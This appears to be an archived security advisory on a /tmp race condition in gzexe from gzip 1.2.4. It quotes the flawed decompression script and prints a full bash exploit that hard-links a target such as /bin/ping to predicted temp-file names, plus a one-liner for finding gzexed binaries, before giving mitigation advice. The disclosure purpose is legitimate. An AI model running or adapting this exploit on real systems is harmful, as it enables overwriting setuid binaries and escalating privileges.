COMMAND

    gzexe (gzip 1.2.4)

SYSTEMS AFFECTED

    Systems running gzexe

PROBLEM

    Michal Zalewski  posted following  vulnerabilty he  found.  GZEXE,
    part  of   gzip  package,   is  a   small  utility   which  allows
    'transparent' compressio any kind of executables (just like pklite
    under MS DOS).   Unfortunatelly, it may  be extremally  dangerous.
    Here's the shell script used to decompression:

        if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
        [...]                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        /tmp/gztmp$$ ${1+"$@"}; res=3D$?
        ^^^^^^^^^^^^

    This  is  an  example  of  badly-written  one.   It's  possible to
    overwrite  any  file  (including  SUIDs!)  with  code  of   gzexed
    executable when root executes it...  Then, this unwanted suid  may
    be easily exploited.  It's  also possible to enforce execution  of
    OUR OWN code instead of 20  gzexed program, just by choosing as  a
    victim any file not  owned by user running  vunerable executables,
    but writable by  him/her.  This  file (even setuid)  may be freely
    modified by attacker.  Exploit code follows:

    #!/bin/bash

    # GZEXE executables exploit (gzip 1.2.4)
    # by Michal Zalewski (lcamtuf@staszic.waw.pl)
    # ---------------------------------------------

    VICTIM=/bin/ping
    GZEXED=a.out

    # Note: to locate gzexed executables you may use this:
    # find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "

    if [ ! -f $VICTIM ]; then
      echo "I can't find my victim ($VICTIM)..."
      exit 0
    fi

    ORIG=`ls -l $VICTIM|awk '{print \$5}'`

    echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

    renice +20 $PPID >&/dev/null

    cd /tmp

    touch $GZEXED

    while :; do

      START=`ps|awk '$6=="ps"{print $1}'`

      let START=START+100
      let DO=START+100

      while [ "$START" -lt "$DO" ]; do
        ln $VICTIM gztmp$START &>/dev/null
        let START=START+1
      done

      sleep 10

      rm -f gztmp* &>/dev/null

      NOWY=`ls -l $VICTIM|awk '{print \$5}'`

      if [ ! "$ORIG" = "$NOWY" ]; then
        echo "Done, my master."
        exit 0
      fi

    done

    It may be  left in backgroud.  Please verify vunerable  executable
    filename (GZEXED - you may  specify more than one file,  separated
    by spaces).

SOLUTION

    Do not use gzexe to compress executables.  That's all, TMPDIR will
    NOT help in this case.  Patch expected to be released soon.   This
    /tmp race was  fixed in the  OpenBSD back in  August 1997.   Looks
    like OpenBSD 2.2 is not vulnerable.